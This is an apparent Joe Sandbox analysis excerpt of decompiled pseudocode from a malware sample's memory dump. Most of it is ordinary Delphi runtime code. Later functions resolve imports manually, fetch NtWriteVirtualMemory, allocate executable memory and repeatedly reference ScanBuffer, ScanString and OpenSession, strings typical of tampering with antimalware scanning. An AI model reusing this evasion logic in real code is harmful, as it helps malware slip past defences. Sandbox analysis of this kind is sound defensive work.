                    					return E03264710(0x32897d0, 0x80,  &_v128);
                    				}
                    				return _t7;
                    			}











                    APIs
                    • GetVersionExA.KERNEL32(?,03288106,00000000,0328811E), ref: 0326B77E
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Version
                    • String ID:
                    • API String ID: 1889659487-0
                    • Opcode ID: 4780b526f1a7682b53b4ca9d1f3986adf45b3592f0154431b69fe115150d0772
                    • Instruction ID: cb29c7e40706061d0e5233fd63b2ffe577a3660ad4c3407055556d5c167f465d
                    • Opcode Fuzzy Hash: 4780b526f1a7682b53b4ca9d1f3986adf45b3592f0154431b69fe115150d0772
                    • Instruction Fuzzy Hash: 69F0B7B95153029FF750EF29E444A2577E4FB48714F04892DE899C7384E73894C4CF52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E0326A7F4(int __eax, signed int __ecx, int __edx) {
                    				char _v16;
                    				signed int _t5;
                    				signed int _t6;
                    
                    				_push(__ecx);
                    				_t6 = __ecx;
                    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                    					_t5 = _t6;
                    				} else {
                    					_t5 = _v16 & 0x000000ff;
                    				}
                    				return _t5;
                    			}







                    APIs
                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0326BE56,00000000,0326C06F,?,?,00000000,00000000), ref: 0326A807
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 7e8920f8d0d2d0f23a6a7b610fcb7e2c8d9d986827befababdb0fca97cc2ae55
                    • Instruction ID: 46d126beb05d57990f4c4a21f1dfa220bb2fedcecf75398f3c30070f7d8be6f4
                    • Opcode Fuzzy Hash: 7e8920f8d0d2d0f23a6a7b610fcb7e2c8d9d986827befababdb0fca97cc2ae55
                    • Instruction Fuzzy Hash: 1FD05EB632D2612AE210915A3D84D7B5ADCCEC66A1F04807AB688DB100E2408C8693B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E032691F0() {
                    				struct _SYSTEMTIME* _t2;
                    
                    				GetLocalTime(_t2);
                    				return _t2->wYear & 0x0000ffff;
                    			}




                    0x032691f4
                    0x03269200

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: LocalTime
                    • String ID:
                    • API String ID: 481472006-0
                    • Opcode ID: f4f18dacdc05837cd8c7ce478f2f875bfbac66a52ed17a04de46c01d51863990
                    • Instruction ID: 9d0e38e348573b05ad690d3ea69351774f4058184a384d1dc5effbb8b295cf84
                    • Opcode Fuzzy Hash: f4f18dacdc05837cd8c7ce478f2f875bfbac66a52ed17a04de46c01d51863990
                    • Instruction Fuzzy Hash: E3A0121440582015814033180C0217830405C01520FC8074468F8A42E0E91D01A04193
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E032620C4(void* __eax, char* __edx) {
                    				char* _t103;
                    
                    				_t103 = __edx;
                    				_t39 = __eax + 1;
                    				 *__edx = 0xffffffff89705f71;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = 0xbadbbd;
                    				asm("sbb edi, 0xffffffff");
                    				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
                    				_t37 = _t103 + 1; // 0x1
                    				return _t37;
                    			}





                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326D278() {
                    				struct HINSTANCE__* _v8;
                    				intOrPtr _t46;
                    				void* _t91;
                    
                    				_v8 = GetModuleHandleA("oleaut32.dll");
                    				 *0x329e22c = E0326D24C("VariantChangeTypeEx", E0326CDE4, _t91);
                    				 *0x329e230 = E0326D24C("VarNeg", E0326CE14, _t91);
                    				 *0x329e234 = E0326D24C("VarNot", E0326CE14, _t91);
                    				 *0x329e238 = E0326D24C("VarAdd", E0326CE20, _t91);
                    				 *0x329e23c = E0326D24C("VarSub", E0326CE20, _t91);
                    				 *0x329e240 = E0326D24C("VarMul", E0326CE20, _t91);
                    				 *0x329e244 = E0326D24C("VarDiv", E0326CE20, _t91);
                    				 *0x329e248 = E0326D24C("VarIdiv", E0326CE20, _t91);
                    				 *0x329e24c = E0326D24C("VarMod", E0326CE20, _t91);
                    				 *0x329e250 = E0326D24C("VarAnd", E0326CE20, _t91);
                    				 *0x329e254 = E0326D24C("VarOr", E0326CE20, _t91);
                    				 *0x329e258 = E0326D24C("VarXor", E0326CE20, _t91);
                    				 *0x329e25c = E0326D24C("VarCmp", E0326CE2C, _t91);
                    				 *0x329e260 = E0326D24C("VarI4FromStr", E0326CE38, _t91);
                    				 *0x329e264 = E0326D24C("VarR4FromStr", E0326CEA4, _t91);
                    				 *0x329e268 = E0326D24C("VarR8FromStr", E0326CF10, _t91);
                    				 *0x329e26c = E0326D24C("VarDateFromStr", E0326CF7C, _t91);
                    				 *0x329e270 = E0326D24C("VarCyFromStr", E0326CFE8, _t91);
                    				 *0x329e274 = E0326D24C("VarBoolFromStr", E0326D054, _t91);
                    				 *0x329e278 = E0326D24C("VarBstrFromCy", E0326D0D4, _t91);
                    				 *0x329e27c = E0326D24C("VarBstrFromDate", E0326D144, _t91);
                    				_t46 = E0326D24C("VarBstrFromBool", E0326D1B8, _t91);
                    				 *0x329e280 = _t46;
                    				return _t46;
                    			}







                    APIs
                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0326D281
                      • Part of subcall function 0326D24C: GetProcAddress.KERNEL32(00000000), ref: 0326D265
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                    • API String ID: 1646373207-1918263038
                    • Opcode ID: 933350997f14de32a07397ff759d202494cbd7180df2083f1f324c8c4329f829
                    • Instruction ID: 92330bf2676d8ef304d9c1ecb9b544badf942508303af584a560e8cd17b018ed
                    • Opcode Fuzzy Hash: 933350997f14de32a07397ff759d202494cbd7180df2083f1f324c8c4329f829
                    • Instruction Fuzzy Hash: DB4105B5B3434C5B5208FB6DB40042BB7A9DE88A10361802BB8488F759DF60FCC59BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E03262530(void* __eax, void* __fp0) {
                    				void* _v8;
                    				char _v110600;
                    				char _v112644;
                    				char _v112645;
                    				signed int _v112652;
                    				char _v112653;
                    				char _v112654;
                    				char _v112660;
                    				intOrPtr _v112664;
                    				intOrPtr _v112668;
                    				intOrPtr _v112672;
                    				struct HWND__* _v112676;
                    				signed short* _v112680;
                    				intOrPtr* _v112684;
                    				char _v129068;
                    				char _v131117;
                    				char _v161836;
                    				void* _v162091;
                    				signed char _v162092;
                    				void* _t73;
                    				int _t79;
                    				signed int _t126;
                    				int _t131;
                    				intOrPtr _t132;
                    				char* _t134;
                    				char* _t135;
                    				char* _t136;
                    				char* _t137;
                    				char* _t138;
                    				char* _t139;
                    				char* _t141;
                    				char* _t142;
                    				char* _t147;
                    				char* _t148;
                    				intOrPtr _t180;
                    				void* _t182;
                    				void* _t184;
                    				void* _t185;
                    				intOrPtr* _t188;
                    				intOrPtr* _t189;
                    				signed int _t194;
                    				void* _t197;
                    				void* _t198;
                    				void* _t211;
                    
                    				_push(__eax);
                    				_t73 = 0x27;
                    				goto L1;
                    				L12:
                    				while(_t180 != 0x329b708) {
                    					_t79 = E03262048(_t180);
                    					_t131 = _t79;
                    					__eflags = _t131;
                    					if(_t131 == 0) {
                    						L11:
                    						_t180 =  *((intOrPtr*)(_t180 + 4));
                    						continue;
                    					} else {
                    						goto L4;
                    					}
                    					do {
                    						L4:
                    						_t194 =  *(_t131 - 4);
                    						__eflags = _t194 & 0x00000001;
                    						if((_t194 & 0x00000001) == 0) {
                    							__eflags = _t194 & 0x00000004;
                    							if(__eflags == 0) {
                    								__eflags = _v112652 - 0x1000;
                    								if(_v112652 < 0x1000) {
                    									_v112664 = (_t194 & 0xfffffff0) - 4;
                    									_t126 = E0326238C(_t131);
                    									__eflags = _t126;
                    									if(_t126 == 0) {
                    										_v112645 = 0;
                    										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
                    										_t18 =  &_v112652;
                    										 *_t18 = _v112652 + 1;
                    										__eflags =  *_t18;
                    									}
                    								}
                    							} else {
                    								E032623E4(_t131, __eflags, _t197);
                    							}
                    						}
                    						_t79 = E03262024(_t131);
                    						_t131 = _t79;
                    						__eflags = _t131;
                    					} while (_t131 != 0);
                    					goto L11;
                    				}
                    				_t132 =  *0x329d7b0; // 0x7fde0000
                    				while(_t132 != 0x329d7ac && _v112652 < 0x1000) {
                    					_t79 = E0326238C(_t132 + 0x10);
                    					__eflags = _t79;
                    					if(_t79 == 0) {
                    						_v112645 = 0;
                    						_t22 = _t132 + 0xc; // 0xd0004
                    						_t79 = _v112652;
                    						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
                    						_t27 =  &_v112652;
                    						 *_t27 = _v112652 + 1;
                    						__eflags =  *_t27;
                    					}
                    					_t29 = _t132 + 4; // 0x7f2d0000
                    					_t132 =  *_t29;
                    				}
                    				if(_v112645 != 0) {
                    					L48:
                    					return _t79;
                    				}
                    				_v112653 = 0;
                    				_v112668 = 0;
                    				_t134 = E032621E0(0x28,  &_v161836);
                    				_v112660 = 0x37;
                    				_v112680 = 0x3289042;
                    				_v112684 =  &_v110600;
                    				do {
                    					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
                    					_v112654 = 0;
                    					_t182 = 0xff;
                    					_t188 = _v112684;
                    					while(_t134 <=  &_v131117) {
                    						if( *_t188 > 0) {
                    							if(_v112653 == 0) {
                    								_t134 = E032621E0(0x27, _t134);
                    								_v112653 = 1;
                    							}
                    							if(_v112654 != 0) {
                    								 *_t134 = 0x2c;
                    								_t139 = _t134 + 1;
                    								 *_t139 = 0x20;
                    								_t140 = _t139 + 1;
                    								__eflags = _t139 + 1;
                    							} else {
                    								 *_t134 = 0xd;
                    								 *((char*)(_t134 + 1)) = 0xa;
                    								_t147 = E032620C4(_v112668 + 1, _t134 + 2);
                    								 *_t147 = 0x20;
                    								_t148 = _t147 + 1;
                    								 *_t148 = 0x2d;
                    								 *((char*)(_t148 + 1)) = 0x20;
                    								_t140 = E032621E0(8, E032620C4(_v112672, _t148 + 2));
                    								_v112654 = 1;
                    							}
                    							_t211 = _t182 - 1;
                    							if(_t211 < 0) {
                    								_t141 = E032621E0(7, _t140);
                    							} else {
                    								if(_t211 == 0) {
                    									_t141 = E032621E0(6, _t140);
                    								} else {
                    									E0326363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
                    									_t141 = E032621E0(_v162092 & 0x000000ff, _t140);
                    								}
                    							}
                    							 *_t141 = 0x20;
                    							_t142 = _t141 + 1;
                    							 *_t142 = 0x78;
                    							 *((char*)(_t142 + 1)) = 0x20;
                    							_t134 = E032620C4( *_t188, _t142 + 2);
                    						}
                    						_t182 = _t182 - 1;
                    						_t188 = _t188 - 8;
                    						if(_t182 != 0xffffffff) {
                    							continue;
                    						} else {
                    							goto L37;
                    						}
                    					}
                    					L37:
                    					_v112668 = _v112672;
                    					_v112684 = _v112684 + 0x800;
                    					_v112680 =  &(_v112680[0x10]);
                    					_t60 =  &_v112660;
                    					 *_t60 = _v112660 - 1;
                    				} while ( *_t60 != 0);
                    				if(_v112652 <= 0) {
                    					L47:
                    					E032621E0(3, _t134);
                    					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
                    					goto L48;
                    				}
                    				if(_v112653 != 0) {
                    					 *_t134 = 0xd;
                    					_t136 = _t134 + 1;
                    					 *_t136 = 0xa;
                    					_t137 = _t136 + 1;
                    					 *_t137 = 0xd;
                    					_t138 = _t137 + 1;
                    					 *_t138 = 0xa;
                    					_t134 = _t138 + 1;
                    				}
                    				_t134 = E032621E0(0x3c, _t134);
                    				_t184 = _v112652 - 1;
                    				if(_t184 >= 0) {
                    					_t185 = _t184 + 1;
                    					_v112676 = 0;
                    					_t189 =  &_v129068;
                    					L43:
                    					L43:
                    					if(_v112676 != 0) {
                    						 *_t134 = 0x2c;
                    						_t135 = _t134 + 1;
                    						 *_t135 = 0x20;
                    						_t134 = _t135 + 1;
                    					}
                    					_t134 = E032620C4( *_t189, _t134);
                    					if(_t134 >  &_v131117) {
                    						goto L47;
                    					}
                    					_v112676 =  &(_v112676->i);
                    					_t189 = _t189 + 4;
                    					_t185 = _t185 - 1;
                    					if(_t185 != 0) {
                    						goto L43;
                    					}
                    				}
                    				L1:
                    				_t198 = _t198 + 0xfffff004;
                    				_push(_t73);
                    				_t73 = _t73 - 1;
                    				if(_t73 != 0) {
                    					goto L1;
                    				} else {
                    					E03263098( &_v112644, 0x1b800);
                    					E03263098( &_v129068, 0x4000);
                    					_t79 = 0;
                    					_v112652 = 0;
                    					_v112645 = 1;
                    					_t180 =  *0x329b70c; // 0x91c0000
                    					goto L12;
                    				}
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Message
                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                    • API String ID: 2030045667-32948583
                    • Opcode ID: 235227bc6b49e0abcfb34ac9bb965942933e993b755b545ef6af50fb1a5469be
                    • Instruction ID: a27ff273a4fdec27cbe6f6f729a7ba2a41993e5fdba57b2cfff96200c4ba392c
                    • Opcode Fuzzy Hash: 235227bc6b49e0abcfb34ac9bb965942933e993b755b545ef6af50fb1a5469be
                    • Instruction Fuzzy Hash: 3CA1D534A24358CBDB21EA2CCC84BD8B6E8EF09750F1449E5D549AB382CBB589C5CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0327A58C(intOrPtr _a4, void* _a8) {
                    				void* _v8;
                    				struct HINSTANCE__* _v12;
                    				intOrPtr _v16;
                    				int _t23;
                    				void* _t49;
                    				void* _t51;
                    				void* _t52;
                    
                    				_t51 = _a8;
                    				while(1) {
                    					_t23 = IsBadReadPtr(_t51, 0x14);
                    					if(_t23 != 0 ||  *((intOrPtr*)(_t51 + 0x10)) == 0 ||  *((intOrPtr*)(_t51 + 0xc)) == 0) {
                    						break;
                    					}
                    					_v8 =  *((intOrPtr*)(_t51 + 0xc)) + _a4;
                    					if(IsBadReadPtr(_v8, 4) != 0) {
                    						L13:
                    						_t51 = _t51 + 0x14;
                    						continue;
                    					}
                    					 *0x329e514 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\KernelBase.dll"), "LoadLibraryExA");
                    					_v12 =  *0x329e514(_v8, 0, 0);
                    					_t49 =  *((intOrPtr*)(_t51 + 0x10)) + _a4;
                    					_t52 = _t49;
                    					if( *((intOrPtr*)(_t51 + 4)) == 0xffffffff) {
                    						_t49 =  *_t51 + _a4;
                    					}
                    					while(IsBadReadPtr(_t49, 4) == 0 && IsBadReadPtr(_t52, 2) == 0 &&  *_t49 != 0) {
                    						if(E03277A50(0, _t52, 4, 0x40, _v16) != 0) {
                    							if(( *(_t49 + 3) & 0x00000080) == 0) {
                    								 *_t52 = GetProcAddress(_v12, _a4 +  *_t49 + 2);
                    							} else {
                    								 *_t52 = GetProcAddress(_v12,  *_t49 & 0x0000ffff);
                    							}
                    							E03277A50(0, _t52, 4, _v16, _v16);
                    						}
                    						_t49 = _t49 + 4;
                    						_t52 = _t52 + 4;
                    					}
                    					goto L13;
                    				}
                    				return _t23;
                    			}

                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0327A5AC
                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0327A5C3
                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0327A5C9
                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 0327A657
                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0327A663
                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 0327A677
                    Strings
                    • C:\Windows\System32\KernelBase.dll, xrefs: 0327A5BE
                    • LoadLibraryExA, xrefs: 0327A5B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Read$AddressHandleModuleProc
                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                    • API String ID: 1061262613-1650066521
                    • Opcode ID: 8c5920a08f19f03da4ad3bbfedbbe6b61085a4efff04f36adde5bebcfb4e800e
                    • Instruction ID: d5869f3e266cdb30ec53edcfa8975dbd59e5635eedbc0cef17c36d4a70ccea10
                    • Opcode Fuzzy Hash: 8c5920a08f19f03da4ad3bbfedbbe6b61085a4efff04f36adde5bebcfb4e800e
                    • Instruction Fuzzy Hash: 15315CB5A20306BBDF20DF68DC85F5EB7A8BF05764F144254EA14EA380D3B4A9C08B65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 43%
                    			E0327C24C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                    				char _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				intOrPtr _v40;
                    				char _v44;
                    				char _v48;
                    				char _v52;
                    				intOrPtr _v56;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				intOrPtr _v72;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				intOrPtr _v88;
                    				char _v92;
                    				char _v96;
                    				char _v100;
                    				intOrPtr _v104;
                    				char _v108;
                    				char _v112;
                    				char _v116;
                    				intOrPtr _v120;
                    				char _v124;
                    				char _v128;
                    				char _v132;
                    				intOrPtr _v136;
                    				char _v140;
                    				char _v144;
                    				char _v148;
                    				intOrPtr _v152;
                    				char _v156;
                    				char _v160;
                    				char _v164;
                    				intOrPtr _v168;
                    				char _v172;
                    				char _v176;
                    				char _v180;
                    				intOrPtr _v184;
                    				char _v188;
                    				char _v192;
                    				char _v196;
                    				intOrPtr _v200;
                    				char _v204;
                    				char _v208;
                    				char _v212;
                    				intOrPtr _v216;
                    				char _v220;
                    				char _v224;
                    				char _v228;
                    				intOrPtr _v232;
                    				char _v236;
                    				char _v240;
                    				void* __ecx;
                    				_Unknown_base(*)()* _t168;
                    				signed int _t244;
                    				signed int _t276;
                    				_Unknown_base(*)()** _t279;
                    				intOrPtr _t345;
                    				void* _t368;
                    				void* _t373;
                    				void* _t378;
                    				_Unknown_base(*)()** _t379;
                    				void* _t384;
                    				void* _t389;
                    				void* _t394;
                    				void* _t399;
                    				void* _t404;
                    				void* _t409;
                    				void* _t414;
                    				void* _t419;
                    				void* _t424;
                    				intOrPtr _t425;
                    				void* _t431;
                    				void* _t436;
                    				void* _t438;
                    				void* _t440;
                    				intOrPtr _t442;
                    				intOrPtr _t443;
                    
                    				_t442 = _t443;
                    				_t345 = 0x1d;
                    				do {
                    					_push(0);
                    					_push(0);
                    					_t345 = _t345 - 1;
                    					_t444 = _t345;
                    				} while (_t345 != 0);
                    				_t1 =  &_v8;
                    				 *_t1 = _t345;
                    				_v12 =  *_t1;
                    				_v8 = __edx;
                    				_t438 = __eax;
                    				_push(_t442);
                    				_push(0x327c895);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t443;
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v20, E03264964(_v24));
                    				_push(_v20);
                    				E032647B0( &_v32,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v28, E03264964(_v32));
                    				_pop(_t368);
                    				E03277C04(_v28,  *0x329e544, _t368, _t444);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v36, E03264964(_v40));
                    				_push(_v36);
                    				E032647B0( &_v48,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v44, E03264964(_v48));
                    				_pop(_t373);
                    				E03277C04(_v44,  *0x329e544, _t373, _t444);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v52, E03264964(_v56));
                    				_push(_v52);
                    				E032647B0( &_v64,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v60, E03264964(_v64));
                    				_pop(_t378);
                    				E03277C04(_v60,  *0x329e544, _t378, _t444);
                    				_t168 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
                    				_t379 =  *0x329a888; // 0x329e320
                    				 *_t379 = _t168;
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v68, E03264964(_v72));
                    				_push(_v68);
                    				E032647B0( &_v80,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v76, E03264964(_v80));
                    				_pop(_t384);
                    				E03277C04(_v76,  *0x329e544, _t384, _t444);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v84, E03264964(_v88));
                    				_push(_v84);
                    				E032647B0( &_v96,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v92, E03264964(_v96));
                    				_pop(_t389);
                    				E03277C04(_v92,  *0x329e544, _t389, _t444);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v100, E03264964(_v104));
                    				_push(_v100);
                    				E032647B0( &_v112,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v108, E03264964(_v112));
                    				_pop(_t394);
                    				E03277C04(_v108,  *0x329e544, _t394, _t444);
                    				_t445 = _v8;
                    				if(_v8 != 0) {
                    					_push(0x327c8b0);
                    					_push( *0x329e544);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v116, E03264964(_v120));
                    					_push(_v116);
                    					E032647B0( &_v128,  *0x329e544, 0x327c8b0);
                    					E03264698( &_v124, E03264964(_v128));
                    					_pop(_t436);
                    					E03277C04(_v124,  *0x329e544, _t436, _t445);
                    				}
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v132, E03264964(_v136));
                    				_push(_v132);
                    				E032647B0( &_v144,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v140, E03264964(_v144));
                    				_pop(_t399);
                    				E03277C04(_v140,  *0x329e544, _t399, _t445);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v148, E03264964(_v152));
                    				_push(_v148);
                    				E032647B0( &_v160,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v156, E03264964(_v160));
                    				_pop(_t404);
                    				E03277C04(_v156,  *0x329e544, _t404, _t445);
                    				E03262EE0();
                    				 *0x329e548 = (E03262F08(9) + 1) * 0x5f5e100;
                    				_t244 =  *0x329e548; // 0x0
                    				_t440 = E032779BC(_t438, 0, _t244 - _v12, 0x3000, 0x40);
                    				_t446 = _t440;
                    				if(_t440 != 0) {
                    					_push(0x327c8b0);
                    					_push( *0x329e544);
                    					_push("UacInitialize");
                    					E03264824();
                    					E03264698( &_v164, E03264964(_v168));
                    					_push(_v164);
                    					E032647B0( &_v176,  *0x329e544, 0x327c8b0);
                    					E03264698( &_v172, E03264964(_v176));
                    					_pop(_t431);
                    					E03277C04(_v172,  *0x329e544, _t431, _t446);
                    				}
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v180, E03264964(_v184));
                    				_push(_v180);
                    				E032647B0( &_v192,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v188, E03264964(_v192));
                    				_pop(_t409);
                    				E03277C04(_v188,  *0x329e544, _t409, _t446);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v196, E03264964(_v200));
                    				_push(_v196);
